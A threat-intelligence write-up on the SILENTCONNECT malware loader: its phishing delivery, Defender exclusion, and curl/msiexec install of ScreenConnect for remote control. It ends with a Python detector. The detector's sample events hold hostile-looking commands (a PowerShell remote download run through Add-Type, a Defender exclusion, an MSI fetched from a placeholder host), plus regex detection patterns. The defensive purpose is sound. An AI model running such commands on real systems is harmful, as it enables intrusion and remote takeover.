SILENTCONNECT is a new multi-stage malware loader that has been quietly attacking Windows computers since at least March 2025. It uses VBScript, in-memory PowerShell execution, and PEB masquerading to install the ConnectWise ScreenConnect remote monitoring and management tool on the victim's systems.
Once installed, ScreenConnect lets the attacker control the compromised machine's keyboard, which is a big problem for businesses all over the world. The infection starts when someone gets a phishing email with a link that looks like it goes to a real invitation or proposal. When the victim clicks it, they are sent to a Cloudflare Turnstile CAPTCHA page that asks them to prove they are human.
SILENTCONNECT adds an exception for Microsoft Defender (Source: Elastic). It then uses curl.exe to download the ScreenConnect MSI from bumptobabeco[.]top, installs it with msiexec.exe, and sets it up as a Windows service that sends data to the attacker's server over TCP port 8041.
Companies should regularly check their environments for unauthorized RMM installations and keep an eye on traffic going out to ScreenConnect server addresses that they don't know about.
Security teams should keep an eye out for PowerShell commands that combine Add-Type with remote downloads, VBScript files that are downloaded from the internet, and unexpected changes to Defender exclusions. Tracking calls to NtAllocateVirtualMemory from .NET processes can also help stop this threat before it gets too far.
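The checks recommended above can be prototyped over process-creation logs. The following is an added example, not code from Elastic or from this article: the rule names, the `detect` function, the Downloads/Temp path heuristic for "downloaded" VBScript, and every sample event are assumptions constructed for illustration.

```python
import re

# Constructed (image, command line) events; none are taken from the report.
SAMPLE_EVENTS = [
    ("wscript.exe", r'wscript.exe "C:\Users\u\Downloads\Proposal.vbs"'),
    ("powershell.exe", r"powershell.exe -c $c=(New-Object Net.WebClient)"
     r".DownloadString('https://example.invalid/s'); Add-Type -TypeDefinition $c"),
    ("powershell.exe", r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public"),
    ("curl.exe", r"curl.exe -o C:\Users\Public\sc.msi https://example.invalid/sc.msi"),
    ("msiexec.exe", r"msiexec.exe /i C:\Users\Public\sc.msi"),
    ("powershell.exe", r"powershell.exe Get-ChildItem C:\Temp"),   # benign
    ("msiexec.exe", r"msiexec.exe /i C:\Installers\office.msi"),   # benign
]

DOWNLOAD = re.compile(r"DownloadString|DownloadData|DownloadFile|Net\.WebClient"
                      r"|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I)
EXCLUSION = re.compile(r"(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)
MSI_PATH = re.compile(r"""([^\s"']+\.msi)\b""", re.I)
# Assumption: a script run from a Downloads or Temp folder stands in for "downloaded".
VBS_USER = re.compile(r'\\(Downloads|Temp)\\[^"]*\.vbs\b', re.I)

def detect(events):
    """Return (event index, rule name) findings for ordered (image, cmdline) events."""
    findings, fetched_msi = [], set()
    for i, (image, cmd) in enumerate(events):
        image = image.lower()
        if image in ("wscript.exe", "cscript.exe") and VBS_USER.search(cmd):
            findings.append((i, "vbs_from_download_dir"))
        if image in ("powershell.exe", "pwsh.exe"):
            if re.search(r"\bAdd-Type\b", cmd, re.I) and DOWNLOAD.search(cmd):
                findings.append((i, "addtype_with_remote_download"))
            if EXCLUSION.search(cmd):
                findings.append((i, "defender_exclusion_change"))
        if image == "curl.exe" and re.search(r"https?://", cmd, re.I):
            # Remember local MSI paths written by curl so a later install can be tied to them.
            fetched_msi.update(p.lower() for p in MSI_PATH.findall(cmd)
                               if not p.lower().startswith("http"))
        if image == "msiexec.exe" and any(
                p.lower() in fetched_msi for p in MSI_PATH.findall(cmd)):
            findings.append((i, "msiexec_installs_curl_fetched_msi"))
    return findings

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(idx, rule, SAMPLE_EVENTS[idx][1])
```

The correlation between curl.exe and msiexec.exe assumes events arrive in time order from a single host; in a SIEM the same logic would be keyed on host and a short time window.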












